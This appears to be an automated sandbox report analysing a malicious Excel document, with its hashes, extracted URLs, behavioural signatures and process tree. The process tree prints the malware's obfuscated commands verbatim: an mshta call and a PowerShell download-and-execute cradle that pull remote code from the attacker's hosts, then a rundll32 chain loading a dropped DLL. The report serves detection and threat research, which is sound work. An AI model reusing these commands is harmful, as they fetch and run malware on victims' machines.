Analysis
-
max time kernel
127s -
max time network
173s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
17-01-2022 22:11
Behavioral task
behavioral1
Sample
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Resource
win10-en-20211208
Behavioral task
behavioral2
Sample
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
Resource
win10-en-20211208
General
-
Target
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls
-
Size
65KB
-
MD5
d13888aa7ccb2000c133b0ca9a1bd653
-
SHA1
a9e3e296c1b75aaee53f93f96d603107a9a6874c
-
SHA256
9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce
-
SHA512
209487538b7314b8f0051ced9bd8850c7dcb3f0e5302722fe799a725e067202959484d72613d1c307b2daba7c1db5ccab6cb781b23808ae92f116b0cc70981bd
Malware Config
Extracted
http://0xc12a24f5/cc.html
Extracted
http://193.42.36.245/PP91.PNG
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1368 3100 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 7 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 32 3632 mshta.exe 36 2288 powershell.exe 38 2288 powershell.exe 46 3216 rundll32.exe 47 3216 rundll32.exe 48 3216 rundll32.exe 51 3216 rundll32.exe -
Downloads MZ/PE file
-
Loads dropped DLL 2 IoCs
Processes:
rundll32.exerundll32.exepid process 1076 rundll32.exe 2464 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 632 3632 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 1484 ipconfig.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3100 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 21 IoCs
Processes:
WerFault.exepowershell.exerundll32.exepid process 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 632 WerFault.exe 2288 powershell.exe 2288 powershell.exe 2288 powershell.exe 3216 rundll32.exe 3216 rundll32.exe 3216 rundll32.exe 3216 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
WerFault.exepowershell.exedescription pid process Token: SeDebugPrivilege 632 WerFault.exe Token: SeDebugPrivilege 2288 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 3100 EXCEL.EXE 3100 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE 3100 EXCEL.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 3100 wrote to memory of 1368 3100 EXCEL.EXE cmd.exe PID 3100 wrote to memory of 1368 3100 EXCEL.EXE cmd.exe PID 1368 wrote to memory of 3632 1368 cmd.exe mshta.exe PID 1368 wrote to memory of 3632 1368 cmd.exe mshta.exe PID 3632 wrote to memory of 2288 3632 mshta.exe powershell.exe PID 3632 wrote to memory of 2288 3632 mshta.exe powershell.exe PID 2288 wrote to memory of 1848 2288 powershell.exe cmd.exe PID 2288 wrote to memory of 1848 2288 powershell.exe cmd.exe PID 1848 wrote to memory of 1076 1848 cmd.exe rundll32.exe PID 1848 wrote to memory of 1076 1848 cmd.exe rundll32.exe PID 1848 wrote to memory of 1076 1848 cmd.exe rundll32.exe PID 1076 wrote to memory of 2464 1076 rundll32.exe rundll32.exe PID 1076 wrote to memory of 2464 1076 rundll32.exe rundll32.exe PID 1076 wrote to memory of 2464 1076 rundll32.exe rundll32.exe PID 2464 wrote to memory of 1708 2464 rundll32.exe rundll32.exe PID 2464 wrote to memory of 1708 2464 rundll32.exe rundll32.exe PID 2464 wrote to memory of 1708 2464 rundll32.exe rundll32.exe PID 1708 wrote to memory of 3216 1708 rundll32.exe rundll32.exe PID 1708 wrote to memory of 3216 1708 rundll32.exe rundll32.exe PID 1708 wrote to memory of 3216 1708 rundll32.exe rundll32.exe PID 3216 wrote to memory of 1228 3216 rundll32.exe systeminfo.exe PID 3216 wrote to memory of 1228 3216 rundll32.exe systeminfo.exe PID 3216 wrote to memory of 1228 3216 rundll32.exe systeminfo.exe PID 3216 wrote to memory of 1484 3216 rundll32.exe ipconfig.exe PID 3216 wrote to memory of 1484 3216 rundll32.exe ipconfig.exe PID 3216 wrote to memory of 1484 3216 rundll32.exe ipconfig.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\9d3854a143ef21ea2f229b04928a70a0bb2f546162e2eae563243d867e00d1ce.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3100 -
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xc12a24f5/cc.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\mshta.exemshta http://0xc12a24f5/cc.html3⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3632 -s 16364⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://193.42.36.245/PP91.PNG'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1076 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:2464 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Petwvvgrt\kbus.wbp",XTdhK8⤵
- Suspicious use of WriteProcessMemory
PID:1708 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Petwvvgrt\kbus.wbp",DllRegisterServer9⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\SysWOW64\systeminfo.exesysteminfo10⤵
- Gathers system information
PID:1228 -
C:\Windows\SysWOW64\ipconfig.exeipconfig /all10⤵
- Gathers network information
PID:1484
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\ssd.dllMD5
94ece97a39d07d3264de94ed36f1fb62
SHA16051bc605470b2ac80ea1b9acf9e60431e783a8f
SHA256c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f
SHA5123943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d
-
\Users\Public\Documents\ssd.dllMD5
94ece97a39d07d3264de94ed36f1fb62
SHA16051bc605470b2ac80ea1b9acf9e60431e783a8f
SHA256c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f
SHA5123943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d
-
\Users\Public\Documents\ssd.dllMD5
94ece97a39d07d3264de94ed36f1fb62
SHA16051bc605470b2ac80ea1b9acf9e60431e783a8f
SHA256c0c691b55a0b4b8fdd13ec7b4ee8a4b045c5d56b2518d06175ad683679a0198f
SHA5123943fdbec69de1bc5850d205441687e009921eb395b08552943ede27d47933c55d588f5ab49ea93e3161b580cd74c21674ce0abe848ef20370422e6cee17d80d
-
memory/1076-321-0x0000000000000000-mapping.dmp
-
memory/1228-354-0x0000000000000000-mapping.dmp
-
memory/1368-256-0x0000000000000000-mapping.dmp
-
memory/1484-356-0x0000000000000000-mapping.dmp
-
memory/1708-338-0x0000000000000000-mapping.dmp
-
memory/1848-320-0x0000000000000000-mapping.dmp
-
memory/2288-315-0x000002679E736000-0x000002679E738000-memory.dmpFilesize
8KB
-
memory/2288-273-0x0000000000000000-mapping.dmp
-
memory/2288-278-0x000002679E730000-0x000002679E732000-memory.dmpFilesize
8KB
-
memory/2288-279-0x000002679E733000-0x000002679E735000-memory.dmpFilesize
8KB
-
memory/2288-280-0x000002679E770000-0x000002679E792000-memory.dmpFilesize
136KB
-
memory/2288-299-0x000002679ED50000-0x000002679ED8C000-memory.dmpFilesize
240KB
-
memory/2288-310-0x000002679EE10000-0x000002679EE86000-memory.dmpFilesize
472KB
-
memory/2464-326-0x0000000000000000-mapping.dmp
-
memory/3100-125-0x0000016664EC0000-0x0000016664EC2000-memory.dmpFilesize
8KB
-
memory/3100-124-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmpFilesize
64KB
-
memory/3100-122-0x0000016664EC0000-0x0000016664EC2000-memory.dmpFilesize
8KB
-
memory/3100-118-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmpFilesize
64KB
-
memory/3100-123-0x0000016664EC0000-0x0000016664EC2000-memory.dmpFilesize
8KB
-
memory/3100-121-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmpFilesize
64KB
-
memory/3100-120-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmpFilesize
64KB
-
memory/3100-119-0x00007FFBD30C0000-0x00007FFBD30D0000-memory.dmpFilesize
64KB
-
memory/3216-343-0x0000000000000000-mapping.dmp
-
memory/3216-355-0x0000000005320000-0x0000000005338000-memory.dmpFilesize
96KB
-
memory/3632-257-0x0000000000000000-mapping.dmp